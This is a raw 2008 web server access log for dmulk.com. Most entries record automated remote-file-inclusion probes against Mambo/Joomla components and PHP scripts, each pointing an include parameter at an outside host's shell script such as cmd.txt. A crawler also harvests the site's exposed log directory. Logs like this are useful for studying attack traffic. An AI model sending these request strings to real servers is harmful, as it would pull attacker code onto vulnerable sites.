83.16.121.90 - - [25/Mar/2008:09:43:03 -0700] "GET //index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:09:43:04 -0700] "GET /logs//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:43:20 -0700] "GET //index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:43:53 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:43:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.148.116.177 - - [25/Mar/2008:09:44:05 -0700] "GET /logs/access_080207.loghttp://amyswedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.29.32 - - [25/Mar/2008:09:44:20 -0700] "GET /?N=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.1.73.77 - - [25/Mar/2008:09:44:29 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 539904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator)" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:45:23 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:46:26 -0700] "GET /logs/access_080223.log//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:46:27 -0700] "GET //index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:46:28 -0700] "GET /logs//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.16.222 - - [25/Mar/2008:09:46:32 -0700] "GET /minamijewelry/source_images/batch1/?S=A HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:46:36 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:46:36 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:46:36 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:46:41 -0700] "GET /logs/index.php?option=com_directory&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:46:41 -0700] "GET /index.php?option=com_directory&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
209.250.234.234 - - [25/Mar/2008:09:47:14 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.250.234.234 - - [25/Mar/2008:09:47:18 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:09:48:44 -0700] "GET /logs/access_080306.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:49:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:49:04 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:49:14 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:49:14 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:49:15 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.219.217.74 - - [25/Mar/2008:09:49:23 -0700] "GET /logs//omponents/com_simpleboard/image_upload.php?sbp=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.219.217.74 - - [25/Mar/2008:09:49:23 -0700] "GET //omponents/com_simpleboard/image_upload.php?sbp=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:49:34 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:53 -0700] "GET / HTTP/1.1" 200 3094 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:54 -0700] "GET /?D=A HTTP/1.1" 200 3094 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:54 -0700] "GET /_private HTTP/1.1" 301 89 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:55 -0700] "GET /_private/ HTTP/1.1" 403 163 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:55 -0700] "GET /backup HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:55 -0700] "GET /backup2 HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:56 -0700] "GET /bikes HTTP/1.1" 301 86 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:56 -0700] "GET /bikes/ HTTP/1.1" 200 2320 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:57 -0700] "GET /drop HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:57 -0700] "GET /funny HTTP/1.1" 301 86 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:58 -0700] "GET /funny/ HTTP/1.1" 200 808 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:58 -0700] "GET /hms HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:58 -0700] "GET /imperant HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:59 -0700] "GET /logs HTTP/1.1" 301 85 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:50:59 -0700] "GET /logs/ HTTP/1.1" 200 40263 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:03 -0700] "GET /megumi HTTP/1.1" 301 87 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:03 -0700] "GET /megumi/ HTTP/1.1" 200 937 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:04 -0700] "GET /minamijewelry HTTP/1.1" 301 94 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:04 -0700] "GET /minamijewelry/ HTTP/1.1" 200 2110 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:04 -0700] "GET /mobilehackers HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:05 -0700] "GET /mobileoffice HTTP/1.1" 301 93 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:05 -0700] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:06 -0700] "GET /plans HTTP/1.1" 301 86 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:06 -0700] "GET /plans/ HTTP/1.1" 200 1111 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:07 -0700] "GET /presto HTTP/1.1" 301 87 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:07 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:08 -0700] "GET /retreat1 HTTP/1.1" 301 89 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:08 -0700] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:09 -0700] "GET /tmp HTTP/1.1" 301 84 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:10 -0700] "GET /tmp/ HTTP/1.1" 200 1335 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:10 -0700] "GET /tools HTTP/1.1" 301 86 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:12 -0700] "GET /tools/ HTTP/1.1" 200 12400 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:13 -0700] "GET /warboard HTTP/1.1" 401 395 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:15 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 393216 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:21 -0700] "GET /funny/terryt1.wmv HTTP/1.1" 200 393216 "-" "Java/1.5.0_06" "dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:51:26 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:51:26 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:26 -0700] "GET /logs/access.log HTTP/1.1" 200 409697 "-" "Java/1.5.0_06" "dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:51:26 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:35 -0700] "GET /logs/access_070624.log HTTP/1.1" 200 110201 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:40 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 28817 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:42 -0700] "GET /logs/access_070626.log HTTP/1.1" 200 32190 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:44 -0700] "GET /logs/access_070627.log HTTP/1.1" 200 163174 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:50 -0700] "GET /logs/access_070628.log HTTP/1.1" 200 28980 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:52 -0700] "GET /logs/access_070629.log HTTP/1.1" 200 29210 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:53 -0700] "GET /logs/access_070630.log HTTP/1.1" 200 36187 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:55 -0700] "GET /logs/access_070701.log HTTP/1.1" 200 48497 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:58 -0700] "GET /logs/access_070702.log HTTP/1.1" 200 2893 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:51:59 -0700] "GET /logs/access_070703.log HTTP/1.1" 200 22875 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:00 -0700] "GET /logs/access_070704.log HTTP/1.1" 200 11515 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:01 -0700] "GET /logs/access_070705.log HTTP/1.1" 200 50888 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:04 -0700] "GET /logs/access_070706.log HTTP/1.1" 200 26632 "-" "Java/1.5.0_06" "dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:06 -0700] "GET /logs/access_080119.log/account.php?action=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:06 -0700] "GET /account.php?action=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:06 -0700] "GET /logs/access_070707.log HTTP/1.1" 200 48967 "-" "Java/1.5.0_06" "dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:07 -0700] "GET /logs/account.php?action=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:09 -0700] "GET /logs/access_070708.log HTTP/1.1" 200 169855 "-" "Java/1.5.0_06" "dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:52:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:52:12 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:15 -0700] "GET /logs/access_080211.log/account.php?action=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:15 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 30963 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:17 -0700] "GET /logs/access_070710.log HTTP/1.1" 200 32027 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:20 -0700] "GET /logs/access_070711.log HTTP/1.1" 200 43580 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:22 -0700] "GET /logs/access_070712.log HTTP/1.1" 200 114624 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:29 -0700] "GET /logs/access_070713.log HTTP/1.1" 200 67092 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:32 -0700] "GET /logs/access_070714.log HTTP/1.1" 200 51386 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:35 -0700] "GET /logs/access_070715.log HTTP/1.1" 200 115427 "-" "Java/1.5.0_06" "dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:38 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:38 -0700] "GET //components/com_forum/download.php?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:52:38 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:43 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 34661 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:45 -0700] "GET /logs/access_070717.log HTTP/1.1" 200 2718 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:46 -0700] "GET /logs/access_070718.log HTTP/1.1" 200 45557 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:49 -0700] "GET /logs/access_070719.log HTTP/1.1" 200 50682 "-" "Java/1.5.0_06" "dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:52:50 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:53 -0700] "GET /logs/access_070720.log HTTP/1.1" 200 29646 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:55 -0700] "GET /logs/access_070721.log HTTP/1.1" 200 23814 "-" "Java/1.5.0_06" "dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:52:57 -0700] "GET /convert/mvcw.php?vwar_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:52:57 -0700] "GET /logs/access_070722.log HTTP/1.1" 200 78392 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:03 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 7507 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:04 -0700] "GET /logs/access_070724.log HTTP/1.1" 200 173704 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:11 -0700] "GET /logs/access_070725.log HTTP/1.1" 200 66166 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:14 -0700] "GET /logs/access_070726.log HTTP/1.1" 200 41609 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:17 -0700] "GET /logs/access_070727.log HTTP/1.1" 200 35863 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:19 -0700] "GET /logs/access_070728.log HTTP/1.1" 200 41969 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:22 -0700] "GET /logs/access_070729.log HTTP/1.1" 200 26979 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:24 -0700] "GET /logs/access_070730.log HTTP/1.1" 200 41451 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:26 -0700] "GET /logs/access_070731.log HTTP/1.1" 200 34839 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:28 -0700] "GET /logs/access_070801.log HTTP/1.1" 200 22773 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:30 -0700] "GET /logs/access_070802.log HTTP/1.1" 200 35303 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:32 -0700] "GET /logs/access_070803.log HTTP/1.1" 200 56048 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:36 -0700] "GET /logs/access_070804.log HTTP/1.1" 200 28778 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:38 -0700] "GET /logs/access_070805.log HTTP/1.1" 200 30484 "-" "Java/1.5.0_06" "dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:53:39 -0700] "GET /logs/index.php?option=com_lmo&file=&action=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:53:39 -0700] "GET /index.php?option=com_lmo&file=&action=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:40 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:41 -0700] "GET /logs/access_070807.log HTTP/1.1" 200 47717 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:45 -0700] "GET /logs/access_070808.log HTTP/1.1" 200 84948 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:49 -0700] "GET /logs/access_070809.log HTTP/1.1" 200 38136 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:50 -0700] "GET /logs/access_070810.log HTTP/1.1" 200 58508 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:53:53 -0700] "GET /logs/access_070811.log HTTP/1.1" 200 94297 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:01 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 98487 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:07 -0700] "GET /logs/access_070814.log HTTP/1.1" 200 55888 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:11 -0700] "GET /logs/access_070815.log HTTP/1.1" 200 31884 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:13 -0700] "GET /logs/access_070816.log HTTP/1.1" 200 48263 "-" "Java/1.5.0_06" "dmulk.com"
83.16.121.90 - - [25/Mar/2008:09:54:16 -0700] "GET /logs/access_080131.log//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:17 -0700] "GET /logs/access_070817.log HTTP/1.1" 200 59720 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:20 -0700] "GET /logs/access_070818.log HTTP/1.1" 200 36125 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:22 -0700] "GET /logs/access_070819.log HTTP/1.1" 200 28182 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:24 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 55005 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:27 -0700] "GET /logs/access_070821.log HTTP/1.1" 200 64221 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:30 -0700] "GET /logs/access_070822.log HTTP/1.1" 200 49732 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:33 -0700] "GET /logs/access_070823.log HTTP/1.1" 200 56843 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:37 -0700] "GET /logs/access_070824.log HTTP/1.1" 200 40957 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:39 -0700] "GET /logs/access_070825.log HTTP/1.1" 200 82596 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:41 -0700] "GET /logs/access_070826.log HTTP/1.1" 200 50531 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:44 -0700] "GET /logs/access_070827.log HTTP/1.1" 200 214217 "-" "Java/1.5.0_06" "dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:54:47 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:51 -0700] "GET /logs/access_070828.log HTTP/1.1" 200 86379 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:54 -0700] "GET /logs/access_070829.log HTTP/1.1" 200 34921 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:56 -0700] "GET /logs/access_070830.log HTTP/1.1" 200 30370 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:54:58 -0700] "GET /logs/access_070831.log HTTP/1.1" 200 35113 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:00 -0700] "GET /logs/access_070901.log HTTP/1.1" 200 28607 "-" "Java/1.5.0_06" "dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:55:01 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:02 -0700] "GET /logs/access_070902.log HTTP/1.1" 200 22717 "-" "Java/1.5.0_06" "dmulk.com"
